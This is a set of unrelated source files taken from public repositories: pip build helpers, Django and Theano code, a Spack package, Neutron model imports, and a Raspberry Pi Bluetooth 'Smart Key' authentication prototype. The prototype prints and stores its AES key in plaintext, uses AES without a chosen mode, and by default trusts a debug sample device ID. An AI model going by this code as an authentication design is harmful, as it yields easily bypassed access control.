import sys from pip._internal.utils.typing import MYPY_CHECK_RUNNING if MYPY_CHECK_RUNNING: from typing import List, Optional, Sequence # Shim to wrap setup.py invocation with setuptools # # We set sys.argv[0] to the path to the underlying setup.py file so # setuptools / distutils don't take the path to the setup.py to be "-c" when # invoking via the shim. This avoids e.g. the following manifest_maker # warning: "warning: manifest_maker: standard file '-c' not found". _SETUPTOOLS_SHIM = ( "import sys, setuptools, tokenize; sys.argv[0] = {0!r}; __file__={0!r};" "f=getattr(tokenize, 'open', open)(__file__);" "code=f.read().replace('\\r\\n', '\\n');" "f.close();" "exec(compile(code, __file__, 'exec'))" ) def make_setuptools_shim_args( setup_py_path, # type: str global_options=None, # type: Sequence[str] no_user_config=False, # type: bool unbuffered_output=False # type: bool ): # type: (...) -> List[str] """ Get setuptools command arguments with shim wrapped setup file invocation. :param setup_py_path: The path to setup.py to be wrapped. :param global_options: Additional global options. :param no_user_config: If True, disables personal user configuration. :param unbuffered_output: If True, adds the unbuffered switch to the argument list. """ args = [sys.executable] if unbuffered_output: args += ["-u"] args += ["-c", _SETUPTOOLS_SHIM.format(setup_py_path)] if global_options: args += global_options if no_user_config: args += ["--no-user-cfg"] return args def make_setuptools_bdist_wheel_args( setup_py_path, # type: str global_options, # type: Sequence[str] build_options, # type: Sequence[str] destination_dir, # type: str ): # type: (...) -> List[str] # NOTE: Eventually, we'd want to also -S to the flags here, when we're # isolating. Currently, it breaks Python in virtualenvs, because it # relies on site.py to find parts of the standard library outside the # virtualenv. args = make_setuptools_shim_args( setup_py_path, global_options=global_options, unbuffered_output=True ) args += ["bdist_wheel", "-d", destination_dir] args += build_options return args def make_setuptools_clean_args( setup_py_path, # type: str global_options, # type: Sequence[str] ): # type: (...) -> List[str] args = make_setuptools_shim_args( setup_py_path, global_options=global_options, unbuffered_output=True ) args += ["clean", "--all"] return args def make_setuptools_develop_args( setup_py_path, # type: str global_options, # type: Sequence[str] install_options, # type: Sequence[str] no_user_config, # type: bool prefix, # type: Optional[str] home, # type: Optional[str] use_user_site, # type: bool ): # type: (...) -> List[str] assert not (use_user_site and prefix) args = make_setuptools_shim_args( setup_py_path, global_options=global_options, no_user_config=no_user_config, ) args += ["develop", "--no-deps"] args += install_options if prefix: args += ["--prefix", prefix] if home is not None: args += ["--home", home] if use_user_site: args += ["--user", "--prefix="] return args def make_setuptools_egg_info_args( setup_py_path, # type: str egg_info_dir, # type: Optional[str] no_user_config, # type: bool ): # type: (...) -> List[str] args = make_setuptools_shim_args(setup_py_path) if no_user_config: args += ["--no-user-cfg"] args += ["egg_info"] if egg_info_dir: args += ["--egg-base", egg_info_dir] return args def make_setuptools_install_args( setup_py_path, # type: str global_options, # type: Sequence[str] install_options, # type: Sequence[str] record_filename, # type: str root, # type: Optional[str] prefix, # type: Optional[str] header_dir, # type: Optional[str] home, # type: Optional[str] use_user_site, # type: bool no_user_config, # type: bool pycompile # type: bool ): # type: (...) -> List[str] assert not (use_user_site and prefix) assert not (use_user_site and root) args = make_setuptools_shim_args( setup_py_path, global_options=global_options, no_user_config=no_user_config, unbuffered_output=True ) args += ["install", "--record", record_filename] args += ["--single-version-externally-managed"] if root is not None: args += ["--root", root] if prefix is not None: args += ["--prefix", prefix] if home is not None: args += ["--home", home] if use_user_site: args += ["--user", "--prefix="] if pycompile: args += ["--compile"] else: args += ["--no-compile"] if header_dir: args += ["--install-headers", header_dir] args += install_options return args
xavfernandez/pip
src/pip/_internal/utils/setuptools_build.py
Python
mit
5,070
# Allow the use of / operator for division to yield floats instead of integers: # http://docs.python.org/whatsnew/2.2.html#pep-238-changing-the-division-operator from __future__ import division # Imports from standard libraries from datetime import date, timedelta import hashlib import os import urllib2 # Imports from Django from django.conf import settings from django.contrib.auth.models import User from django.contrib.contenttypes import generic from django.contrib.contenttypes.models import ContentType from django.contrib.markup.templatetags.markup import markdown from django.contrib.sites.models import Site from django.core.files import File from django.contrib.gis.db import models from django.utils import simplejson # Imports from Brubeck from brubeck.core.models import Content # Imports from other source from pyPdf import PdfFileReader, PdfFileWriter # This is a hippopotamus. # .-''''-. _ # (' ' '0)-/) # '..____..: \._ # \u u ( '-..------._ # | / : '. '--. # .nn_nn/ ( : ' '\ # ( '' '' / ; . \ # ''----' "\ : : '. # .'/ '. # / / '. # /_| ) .\| # | /\ . ' # '--.__| '--._ , / # /'-, .' # / | _.' # (____\ / # \ \ # '-'-'-' class PublishedManager(models.Manager): """ Only returns articles that have been marked as published. This is handy for such content as articles and blog posts that might need editing before being published. """ def get_query_set(self): return super(PublishedManager, self).get_query_set().filter(is_published=True) class Article(Content): """ Provides support for news stories. The workhorse of the site. Some fields in this model might be marked as deprecated. These will be hidden in the admin site. """ TWO_WEEKS_AGO = date.today() - timedelta(14) TYPE_CHOICES = ( ('story', "Story/Brief"), # ('online', "Online Exclusive"), ('online', "Web Update"), ('column', "Column"), ('editorial', "Editorial"), ('letter', "Letter to the Editor"), ('guest', "Guest Column"), ) title = models.CharField(max_length=150, db_index=True) issue = models.ForeignKey('publishing.Issue', db_index=True, help_text="The issue in which this article was published.") section = models.ForeignKey('publishing.Section', db_index=True) layout = models.ForeignKey('design.Layout', db_index=True, blank=True, null=True, db_column='page_id', help_text="Deprecated. In the 2008 site, this held the relation between Layout and Article objects. This relation is now in Layout.articles as a ManyToManyField.") type = models.CharField(max_length=30, db_index=True, choices=TYPE_CHOICES, default='story') priority = models.PositiveIntegerField('priority/page number', db_index=True, default=10, help_text="The lower this number, the higher the article is displayed (compared to other articles published the same day). <strong>You should use the page number for this</strong>, but it isn't strictly required that you do so.<br />If you set this to 0 (the number zero), it will become the top story on the site and be automatically sent out over Twitter.") updated = models.BooleanField(db_index=True, default=False, help_text="Whether or not this article has been updated since it was last posted. If this is checked, the article will show the date and time when it was most recently saved on the front page, the archives and the article page itself.") cdeck = models.CharField('c-deck', max_length=255, blank=True, help_text="The optional text that appears before the article. If provided, this becomes the article's teaser in various places on the site.") body = models.TextField(help_text="The content of the article. Accepts HTML (for embeds and such), but primarily uses <a href=\"http://daringfireball.net/projects/markdown/basics\">Markdown</a> formatting. The basics:<ul><li>Separate paragraphs by blank lines.</li><li>Italicize words _like this_.</li><li>Make words (including subheads) bold **like this**.</li><li>Link things like so: Go to [themaneater.com](http://www.themaneater.com/).</li></ul>") photos = models.ManyToManyField('photography.Photo', limit_choices_to={'pub_date__gte': TWO_WEEKS_AGO}, blank=True, null=True, help_text="Photos attached to this article. (Can select photos published within the last two weeks.)") editorial_cartoons = models.ManyToManyField('comics.EditorialCartoon', limit_choices_to={'pub_date__gte': TWO_WEEKS_AGO}, blank=True, null=True, help_text="Editorial cartoons attached to this article. (You can select cartoons published within the last two weeks.)") graphics = models.ManyToManyField('design.Graphic', limit_choices_to={'pub_date__gte': TWO_WEEKS_AGO}, blank=True, null=True, help_text="Graphics attached to this article. (Can select graphics published within the last two weeks.)") attached_files = models.ManyToManyField('multimedia.AttachedFile', limit_choices_to={'pub_date__gte': TWO_WEEKS_AGO}, blank=True, null=True, help_text="Other files attached to this article. (Can select files uploaded within the last two weeks.)") videos = models.ManyToManyField('multimedia.Video', limit_choices_to={'pub_date__gte': TWO_WEEKS_AGO}, blank=True, null=True, help_text="Videos attached to this article. (Can select videos published within the last two weeks.)") slideshows = models.ManyToManyField('multimedia.Slideshow', limit_choices_to={'pub_date__gte': TWO_WEEKS_AGO}, blank=True, null=True, help_text="Slideshows attached to this article. (Can select slideshows published within the last two weeks.)") audio_clips = models.ManyToManyField('multimedia.AudioClip', limit_choices_to={'pub_date__gte': TWO_WEEKS_AGO}, blank=True, null=True, help_text="Audio clips attached to this article. (Can select audio clips published within the last two weeks.)") podcast_episodes = models.ManyToManyField('podcasts.Episode', limit_choices_to={'pub_date__gte': TWO_WEEKS_AGO}, blank=True, null=True, help_text="Podcast episodes related to this article. (Can select podcast episodes published in the last two weeks.)") tags = models.ManyToManyField('tagging.Tag', blank=True, null=True, help_text="Tags that describe this article.") calendar = models.ForeignKey('events.Calendar', blank=True, null=True, help_text="If we've created a calendar that has to do with the content of this article, select it here.") map = models.ForeignKey('mapping.Map', verbose_name='attached map', blank=True, null=True, help_text="Choose a map to display with this article.") polls = models.ManyToManyField('voxpopuli.Poll', limit_choices_to={'pub_date__gte': TWO_WEEKS_AGO}, verbose_name='attached polls', blank=True, null=True, help_text="Choose a poll to display with this article.") slug = models.SlugField(db_index=True, unique_for_date='pub_date', help_text="Used for URLs. <strong>DO NOT ENTER THE RUNSHEET SLUG.</strong>. Autogenerated from title.") blurb = models.TextField(blank=True, help_text="Use this if you would like the top story to show something other than its first 40 words on the front page, or if you would like a story other than the top one to show something other than its c-deck in the archives.") sidebar = models.TextField(blank=True, help_text="Use this if you'd like for specific sidebar content (movie review information, related links, etc.) to show up with the article.") runsheet_slug = models.CharField(max_length=50, blank=True, null=True, help_text="The brief phrase used to describe this article on the runsheet. Helps to ensure articles are given the same priority online and in print.") teaser_photo = models.ImageField(upload_to='%Y/%m%d/articles/teaser-photos', blank=True, null=True, help_text="If this article has a magazine-style illustration (for use with top stories on MOVE and Columbia Prowl), upload it here.") mediatype = 'article' # Managers--both the default (normal behavior) and one that just returns # published articles. objects = models.GeoManager() get_published = PublishedManager() def __unicode__(self): return self.title def save(self, *args, **kwargs): # FIXME: Look into ping_google and how it was used before. try: if self.body.count('\r\n\r\n') or self.body.count('\n\n'): pass else: self.body = self.body.replace('\r', '') self.body = self.body.replace('\n', '\r\n\r\n') except: pass super(Article, self).save(*args, **kwargs) def get_absolute_url(self): if self.section.publication.name == 'Columbia Prowl': return 'http://%s/renters-guide/stories/%s/%s/%s/%s/' % (self.section.publication.site.domain, self.pub_date.year, self.pub_date.month, self.pub_date.day, self.slug) else: return 'http://%s/stories/%s/%s/%s/%s/' % (self.section.publication.site.domain, self.pub_date.year, self.pub_date.month, self.pub_date.day, self.slug) class Meta: get_latest_by = 'pub_date' ordering = ['issue', '-pub_date', 'priority', 'section', 'title'] from brubeck.core.moderation import AkismetModerator from brubeck.core.emailing.views import render_email_and_send from django.conf import settings from django.contrib.comments.moderation import moderator class ArticleModerator(AkismetModerator): enable_field = 'enable_comments' def email(self, comment, content_object, request): moderators = [] chief = settings.EDITORS['chief'] moderators.append(chief) managing = settings.EDITORS['managing'] moderators.append(managing) online_dev = settings.EDITORS['online_dev'] moderators.append(online_dev) context = {'comment': comment, 'content_object': content_object} subject = 'New comment awaiting moderation on "%s"' % content_object render_email_and_send(context=context, message_template='core/comment_notification_email.txt', subject=subject, recipients=moderators) def moderate(self, comment, content_object, request): return True moderator.register(Article, ArticleModerator) class Correction(models.Model): """ Provides support for publishing corrections to articles. This model is edited inline as part of the Article change page. """ article = models.ForeignKey(Article) date_corrected = models.DateTimeField() correction = models.CharField(max_length=500) def __unicode__(self): return "Correction to %s" % self.article class Meta: get_latest_by = 'date_corrected' ordering = ['-date_corrected', 'article']
albatrossandco/brubeck_cms
brubeck/articles/models.py
Python
bsd-3-clause
11,291
import six.moves.cPickle as pickle import os import shutil import tempfile import unittest import numpy import theano from theano.compile.io import In def test_function_dump(): v = theano.tensor.vector() fct1 = theano.function([v], v + 1) try: tmpdir = tempfile.mkdtemp() fname = os.path.join(tmpdir, 'test_function_dump.pkl') theano.function_dump(fname, [v], v + 1) f = open(fname, 'rb') l = pickle.load(f) f.close() finally: if tmpdir is not None: shutil.rmtree(tmpdir) fct2 = theano.function(**l) x = [1, 2, 3] assert numpy.allclose(fct1(x), fct2(x)) class TestFunctionIn(unittest.TestCase): def test_in_strict(self): a = theano.tensor.dvector() b = theano.shared(7) out = a + b f = theano.function([In(a, strict=False)], out) # works, rand generates float64 by default f(numpy.random.rand(8)) # works, casting is allowed f(numpy.array([1, 2, 3, 4], dtype='int32')) f = theano.function([In(a, strict=True)], out) try: # fails, f expects float64 f(numpy.array([1, 2, 3, 4], dtype='int32')) except TypeError: pass def test_explicit_shared_input(self): # This is not a test of the In class per se, but the In class relies # on the fact that shared variables cannot be explicit inputs a = theano.shared(1.0) self.assertRaises(TypeError, theano.function, [a], a + 1) def test_in_shared_variable(self): # Ensure that an error is raised if the In wrapped is used to wrap # a shared variable a = theano.shared(1.0) a_wrapped = In(a, update=a + 1) self.assertRaises(TypeError, theano.function, [a_wrapped]) def test_in_mutable(self): a = theano.tensor.dvector() a_out = a * 2 # assuming the op which makes this "in place" triggers # using mutable=True will let f change the value in aval f = theano.function([In(a, mutable=True)], a_out, mode='FAST_RUN') aval = numpy.random.rand(10) aval2 = aval.copy() assert numpy.all(f(aval) == (aval2 * 2)) assert not numpy.all(aval == aval2) # using mutable=False should leave the input untouched f = theano.function([In(a, mutable=False)], a_out, mode='FAST_RUN') aval = numpy.random.rand(10) aval2 = aval.copy() assert numpy.all(f(aval) == (aval2 * 2)) assert numpy.all(aval == aval2) def test_in_update(self): a = theano.tensor.dscalar('a') f = theano.function([In(a, value=0.0, update=a + 1)], a, mode='FAST_RUN') # Ensure that, through the executions of the function, the state of the # input is persistent and is updated as it should assert f() == 0.0 assert f() == 1.0 assert f() == 2.0 def test_in_update_wrong_dtype(self): # Ensure that an error is raised if an In-wrapped variables has # an update of a different type a = theano.tensor.dscalar('a') b = theano.tensor.dvector('b') self.assertRaises(TypeError, In, a, update=b) def test_in_update_shared(self): # Test that using both In() with updates and shared variables with # updates in the same function behaves as expected shared_var = theano.shared(1.0) a = theano.tensor.dscalar('a') a_wrapped = In(a, value=0.0, update=shared_var) f = theano.function([a_wrapped], [], updates={shared_var: a}, mode='FAST_RUN') # Ensure that, through the executions of the function, the state of # the input and the shared variable are appropriate (after N execution, # the values have swapped N times). This allows testing that the # changes occur at the same time and one doesn't overwrite the other. for i in range(5): f() assert numpy.allclose(shared_var.get_value(), i % 2) def test_in_allow_downcast_int(self): a = theano.tensor.wvector('a') # int16 b = theano.tensor.bvector('b') # int8 c = theano.tensor.bscalar('c') # int8 f = theano.function([In(a, allow_downcast=True), In(b, allow_downcast=False), In(c, allow_downcast=None)], (a + b + c)) # Both values are in range. Since they're not ndarrays (but lists), # they will be converted, and their value checked. assert numpy.all(f([3], [6], 1) == 10) # Values are in range, but a dtype too large has explicitly been given # For performance reasons, no check of the data is explicitly performed # (It might be OK to change this in the future.) self.assertRaises(TypeError, f, [3], numpy.array([6], dtype='int16'), 1) # Value too big for a, silently ignored assert numpy.all(f([2 ** 20], numpy.ones(1, dtype='int8'), 1) == 2) # Value too big for b, raises TypeError self.assertRaises(TypeError, f, [3], [312], 1) # Value too big for c, raises TypeError self.assertRaises(TypeError, f, [3], [6], 806) def test_in_allow_downcast_floatX(self): a = theano.tensor.fscalar('a') b = theano.tensor.fscalar('b') c = theano.tensor.fscalar('c') f = theano.function([In(a, allow_downcast=True), In(b, allow_downcast=False), In(c, allow_downcast=None)], (a + b + c)) # If the values can be accurately represented, everything is OK assert numpy.all(f(0, 0, 0) == 0) # If allow_downcast is True, idem assert numpy.allclose(f(0.1, 0, 0), 0.1) # If allow_downcast is False, nope self.assertRaises(TypeError, f, 0, 0.1, 0) # If allow_downcast is None, it should work iff floatX=float32 if theano.config.floatX == 'float32': assert numpy.allclose(f(0, 0, 0.1), 0.1) else: self.assertRaises(TypeError, f, 0, 0, 0.1) def test_in_allow_downcast_vector_floatX(self): a = theano.tensor.fvector('a') b = theano.tensor.fvector('b') c = theano.tensor.fvector('c') f = theano.function([In(a, allow_downcast=True), In(b, allow_downcast=False), In(c, allow_downcast=None)], (a + b + c)) # If the values can be accurately represented, everything is OK z = [0] assert numpy.all(f(z, z, z) == 0) # If allow_downcast is True, idem assert numpy.allclose(f([0.1], z, z), 0.1) # If allow_downcast is False, nope self.assertRaises(TypeError, f, z, [0.1], z) # If allow_downcast is None, like False self.assertRaises(TypeError, f, z, z, [0.1])
valexandersaulys/airbnb_kaggle_contest
venv/lib/python3.4/site-packages/Theano-0.7.0-py3.4.egg/theano/compile/tests/test_function.py
Python
gpl-2.0
7,048
#!/usr/bin/env python3 import orjson import os from wsgiref.handlers import CGIHandler from philologic.runtime.DB import DB from philologic.runtime.HitWrapper import ObjectWrapper from philologic.runtime import generate_text_object import sys sys.path.append("..") import custom_functions try: from custom_functions import WebConfig except ImportError: from philologic.runtime import WebConfig try: from custom_functions import WSGIHandler except ImportError: from philologic.runtime import WSGIHandler def get_text_object(environ, start_response): status = "200 OK" headers = [("Content-type", "application/json; charset=UTF-8"), ("Access-Control-Allow-Origin", "*")] start_response(status, headers) config = WebConfig(os.path.abspath(os.path.dirname(__file__)).replace("scripts", "")) db = DB(config.db_path + "/data/") request = WSGIHandler(environ, config) path = config.db_path zeros = 7 - len(request.philo_id) if zeros: request.philo_id += zeros * " 0" obj = ObjectWrapper(request["philo_id"].split(), db) text_object = generate_text_object(request, config) yield orjson.dumps(text_object) if __name__ == "__main__": CGIHandler().run(get_text_object)
ARTFL-Project/PhiloLogic4
www/scripts/get_text_object.py
Python
gpl-3.0
1,243
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) from spack import * class Xdotool(MakefilePackage): """fake keyboard/mouse input, window management, and more""" homepage = "https://github.com/jordansissel/xdotool" url = "https://github.com/jordansissel/xdotool/releases/download/v3.20160805.1/xdotool-3.20160805.1.tar.gz" version('3.20160805.1', sha256='35be5ff6edf0c620a0e16f09ea5e101d5173280161772fca18657d83f20fcca8') version('3.20160804.2', sha256='2251671c3c3dadab2b70e08bd87f2de6338c7b4e64e7e2d2d881fd13f9bff72c') version('3.20160804.1', sha256='7a76ee57515cc767a00a768f1d04c703279d734255a34f8027c29178561fdce9') version('3.20150503.1', sha256='e8326883bd5e91bede7336cbee186e6e9143f40b3fb61c84afc9bb31b87e96d1') depends_on('libxext') depends_on('libxtst') depends_on('libxi') depends_on('libx11') depends_on('inputproto') depends_on('libxinerama') depends_on('libxkbcommon') def edit(self, spec, prefix): env['PREFIX'] = prefix makefile = FileFilter('Makefile') makefile.filter('xdotool: LDFLAGS+=-Xlinker', '', string=True) makefile.filter('xdotool: LDFLAGS+=-rpath $(INSTALLLIB)', '', string=True)
LLNL/spack
var/spack/repos/builtin/packages/xdotool/package.py
Python
lgpl-2.1
1,385
# Copyright (c) 2014 OpenStack Foundation. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ The module provides all database models at current HEAD. Its purpose is to create comparable metadata with current database schema. Based on this comparison database can be healed with healing migration. """ from neutron.db import agents_db # noqa from neutron.db import agentschedulers_db # noqa from neutron.db import allowedaddresspairs_db # noqa from neutron.db import dvr_mac_db # noqa from neutron.db import external_net_db # noqa from neutron.db import extradhcpopt_db # noqa from neutron.db import extraroute_db # noqa from neutron.db import l3_agentschedulers_db # noqa from neutron.db import l3_attrs_db # noqa from neutron.db import l3_db # noqa from neutron.db import l3_dvrscheduler_db # noqa from neutron.db import l3_gwmode_db # noqa from neutron.db import l3_hamode_db # noqa from neutron.db.metering import metering_db # noqa from neutron.db import model_base from neutron.db import models_v2 # noqa from neutron.db import portbindings_db # noqa from neutron.db import portsecurity_db # noqa from neutron.db import quota_db # noqa from neutron.db import routedserviceinsertion_db # noqa from neutron.db import routerservicetype_db # noqa from neutron.db import securitygroups_db # noqa from neutron.db import servicetype_db # noqa from neutron.plugins.bigswitch.db import consistency_db # noqa from neutron.plugins.bigswitch import routerrule_db # noqa from neutron.plugins.brocade.db import models as brocade_models # noqa from neutron.plugins.cisco.db.l3 import l3_models # noqa from neutron.plugins.cisco.db import n1kv_models_v2 # noqa from neutron.plugins.cisco.db import network_models_v2 # noqa from neutron.plugins.hyperv import model # noqa from neutron.plugins.linuxbridge.db import l2network_models_v2 # noqa from neutron.plugins.metaplugin import meta_models_v2 # noqa from neutron.plugins.ml2.drivers.arista import db # noqa from neutron.plugins.ml2.drivers.brocade.db import ( # noqa models as ml2_brocade_models) from neutron.plugins.ml2.drivers.cisco.apic import apic_model # noqa from neutron.plugins.ml2.drivers.cisco.nexus import ( # noqa nexus_models_v2 as ml2_nexus_models_v2) from neutron.plugins.ml2.drivers import type_flat # noqa from neutron.plugins.ml2.drivers import type_gre # noqa from neutron.plugins.ml2.drivers import type_vlan # noqa from neutron.plugins.ml2.drivers import type_vxlan # noqa from neutron.plugins.ml2 import models # noqa from neutron.plugins.nec.db import models as nec_models # noqa from neutron.plugins.nec.db import packetfilter as nec_packetfilter # noqa from neutron.plugins.nec.db import router # noqa from neutron.plugins.nuage import nuage_models # noqa from neutron.plugins.openvswitch import ovs_models_v2 # noqa from neutron.plugins.vmware.dbexts import lsn_db # noqa from neutron.plugins.vmware.dbexts import maclearning # noqa from neutron.plugins.vmware.dbexts import models as vmware_models # noqa from neutron.plugins.vmware.dbexts import networkgw_db # noqa from neutron.plugins.vmware.dbexts import qos_db # noqa from neutron.plugins.vmware.dbexts import vcns_models # noqa def get_metadata(): return model_base.BASEV2.metadata
leeseuljeong/leeseulstack_neutron
neutron/db/migration/models/head.py
Python
apache-2.0
3,827
__author__ = 'jtromo' #Developed at : SEFCOM Labs by James Romo from bluetooth import * from Crypto.Cipher import AES import threading import time import base64 import os import uuid # ///////////////////////////////////////////////////////////////////////////// # Configuration # ///////////////////////////////////////////////////////////////////////////// # ---------------------------------- Flags ------------------------------------ # Logging Level Controls LOGGING_INFO = 1 LOGGING_DEBUG = 1 LOGGING_ERROR = 1 # Determines which protocol components need creation (if not, read from disk) REQUIRES_SHARED_SECRET_GENERATION = 1 REQUIRES_SMARTKEY_ID_GENERATION = 1 REQUIRES_TRUSTED_DEVICES_GENERATION = 1 # Causes the service to use a sample message from the device instead of real DEBUG_USE_SAMPLE_DEVICE_MESSAGE = 1 if DEBUG_USE_SAMPLE_DEVICE_MESSAGE: print '////////////////////////////////////////////////////////////////////' print '----------------------------- WARNING ------------------------------' print ' ******* Testing Mode Enabled *******' print ' Using sample device message' print ' Must be disabled for demo' print '////////////////////////////////////////////////////////////////////' # -------------------------------- Encryption --------------------------------- # the block size for the cipher object; must be 16, 24, or 32 for AES BLOCK_SIZE = 32 # the character used for padding--with a block cipher such as AES, the value # you encrypt must be a multiple of BLOCK_SIZE in length. This character is # used to ensure that your value is always a multiple of BLOCK_SIZE PADDING = '{' # one-liner to sufficiently pad the text to be encrypted pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING # one-liners to encrypt/encode and decrypt/decode a string # encrypt with AES, encode with base64 EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s))) DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING) # ---------------------- Protocol Components Generation ----------------------- # ********* shared_secretKey ********** # 1) Generate a new shared_secretKey (if required) if REQUIRES_SHARED_SECRET_GENERATION: new_shared_secretKey = os.urandom(BLOCK_SIZE) if LOGGING_DEBUG: print 'Newly generated shared_secretKey:', new_shared_secretKey # 2) Save new shared_secretKey to a file (if required) if REQUIRES_SHARED_SECRET_GENERATION: with open('shared_secretKey', 'w') as file_: file_.write(new_shared_secretKey) if LOGGING_DEBUG: print 'Successfully saved new shared_secretKey' # 3) Read shared_secretKey from file shared_secretKeyFile = open('shared_secretKey') read_shared_secretKey = shared_secretKeyFile.read() if LOGGING_DEBUG: print 'shared_secretKey from file:', read_shared_secretKey # 4) Create a cipher object using shared_secretKey cipher = AES.new(read_shared_secretKey) # *********** smartKey_id ************* # 5) Generate a new smartKey_id (if required) if REQUIRES_SMARTKEY_ID_GENERATION: new_smartKey_id = uuid.uuid4() if LOGGING_DEBUG: print 'Newly generated smartKey_id:', new_smartKey_id # 6) Save new smartKey_id to a file (if required) if REQUIRES_SMARTKEY_ID_GENERATION: with open('smartKey_id', 'w') as file_: file_.write(new_smartKey_id) if LOGGING_DEBUG: print 'Successfully saved new smartKey_id' # 7) Read shared_secretKey from file smartKey_idFile = open('smartKey_id') read_smartKey_id = smartKey_idFile.read() if LOGGING_DEBUG: print 'smartKey_id from file:', read_smartKey_id # ********** trusted_devices ********** # 8) Generate a new list of trusted_devices (if required) if REQUIRES_TRUSTED_DEVICES_GENERATION: new_trusted_devices = [uuid.uuid4(), uuid.uuid4(), uuid.uuid4(), uuid.uuid4()] if LOGGING_DEBUG: print 'Newly generated trusted_devices:', new_trusted_devices # 9) Save new list of trusted_devices to a file (if required) if REQUIRES_TRUSTED_DEVICES_GENERATION: with open('trusted_devices', 'w') as file_: file_.write(new_trusted_devices) if LOGGING_DEBUG: print 'Successfully saved new trusted_devices' # -------------------------- Protocol Components ------------------------------ smartKey_id = read_smartKey_id shared_secretKey = read_shared_secretKey # Sample from phone key sample_device_id = uuid.uuid4() # List of trusted device_ids if DEBUG_USE_SAMPLE_DEVICE_MESSAGE: trusted_devices = [sample_device_id] else: # TODO: Place generated uuid's here trusted_devices = ['trusted1', 'trusted2', 'trusted3', 'trusted4'] # ///////////////////////////////////////////////////////////////////////////// # Client Response Thread # ///////////////////////////////////////////////////////////////////////////// class ClientResponseThread (threading.Thread): def __init__ (self, socket): self.socket = socket threading.Thread.__init__(self) def run (self): try: # Generate timestamp for protocol timestamp = time.time() if LOGGING_DEBUG: print 'timestamp:', timestamp # Create decodedMsg: device_id, timestamp decodedMsg = smartKey_id + '-' + str(timestamp) if LOGGING_DEBUG: print 'decodedMsg:', decodedMsg # Encode message: secretKey(device_id, timestamp) encodedMsg = EncodeAES(cipher, decodedMsg) if LOGGING_DEBUG: print 'encodedMsg:', encodedMsg # Send response self.socket.send (encodedMsg) except: print "Fatal error has occurred during client response. Closing socket..." if LOGGING_ERROR: e = sys.exc_info() print 'Response Thread:', e self.socket.close() # ///////////////////////////////////////////////////////////////////////////// # Smart Key Service # ///////////////////////////////////////////////////////////////////////////// # ---------------------- Bluetooth Socket Configuration ----------------------- server_sock = BluetoothSocket(RFCOMM) server_sock.bind(("", PORT_ANY)) server_sock.listen(1) port = server_sock.getsockname()[1] uuid = "a60f35f0-b93a-11de-8a39-08002009c666" advertise_service(server_sock, "SmartKey", service_id=uuid, service_classes=[uuid, SERIAL_PORT_CLASS], profiles=[SERIAL_PORT_PROFILE], ) if LOGGING_INFO: print("Waiting for connection on RFCOMM channel %d" % port) client_sock, client_info = server_sock.accept() if LOGGING_INFO: print("Accepted connection from ", client_info) # ---------------------------- Bluetooth Service ------------------------------ try: while True: # Retrieve data sent by mobile device data = client_sock.recv(1024) if len(data) > 0: if LOGGING_DEBUG: print("Encoded message received from mobile device: [%s]" % data) # ****** Verify the message came from trusted valid device ****** try: # Decode encrypted message if DEBUG_USE_SAMPLE_DEVICE_MESSAGE: # In place until Android encryption is finished decoded_device_id = sample_device_id else: decoded_device_id = DecodeAES(cipher, data) if LOGGING_DEBUG: print 'Decoded device_id', decoded_device_id # Verify if device_id is in trusted_devices if decoded_device_id in trusted_devices: if LOGGING_INFO: print decoded_device_id, 'verified as a trusted device. Sending response...' ClientResponseThread(client_sock).start() else: if LOGGING_INFO: print decoded_device_id, 'not found in list of trusted_devices' except: print 'Incorrect encrypted data format. Cannot be decoded.' if LOGGING_ERROR: e = sys.exc_info() print 'Decode:', e else: if LOGGING_DEBUG: print 'No data has been received received' except : print 'Fatal error has occurred during bluetooth service. Disconnecting...' if LOGGING_ERROR: e = sys.exc_info() print 'Bluetooth Service:', e # --------------------------------- Exiting ----------------------------------- print("Smart Key Bluetooth Service has stopped.") # Close all sockets client_sock.close() server_sock.close() print("Please Restart service.")
jtromo/ASU-Thesis-RaspberryPiSmartKey
RaspberryPiSmartKey/.sync/Archive/RaspberryPiService/SmartKeyService.9.py
Python
apache-2.0
8,829
# -*- coding: utf-8 -*- import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding field 'AuthoredData.processing_id' db.add_column(u'dingos_authoring_authoreddata', 'processing_id', self.gf('django.db.models.fields.CharField')(default='', max_length=128, blank=True), keep_default=False) def backwards(self, orm): # Deleting field 'AuthoredData.processing_id' db.delete_column(u'dingos_authoring_authoreddata', 'processing_id') models = { u'auth.group': { 'Meta': {'object_name': 'Group'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, u'auth.permission': { 'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, u'auth.user': { 'Meta': {'object_name': 'User'}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 